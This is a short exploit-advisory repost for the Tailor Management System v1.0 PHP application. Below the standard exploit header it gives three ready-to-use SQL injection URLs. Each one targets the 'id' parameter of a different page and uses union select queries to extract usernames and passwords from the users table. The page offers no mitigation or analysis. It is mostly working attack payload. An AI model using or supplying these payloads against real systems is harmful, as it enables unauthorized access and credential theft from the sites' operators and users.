Tailor Management System – ‘id’ SQL Injection – Digitalmunition




Exploit/Advisories 1597662358_spider-orange.png

Published on September 9th, 2020 📆 | 5521 Views ⚑

0

Tailor Management System – ‘id’ SQL Injection

# Exploit Title: Tailor Management System - 'id' SQL Injection
# Google Dork: N/A
# Date: 2020-09-08
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: v1.0
# Tested on: Kali linux
# CVE: N/A



http://localhost/tailor/addmeasurement.php?id=-1'+union+select+concat(username,0x3a,password),2+from+users-- -
http://localhost/tailor/staffedit.php?id=-1'+union+select+1,2,3,concat(username,0x3a,password),5+from+users-- -
http://localhost/tailor/staffcatedit.php?id=-3'+union+select+concat(username,0x3a,password)+from+users-- -
            

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...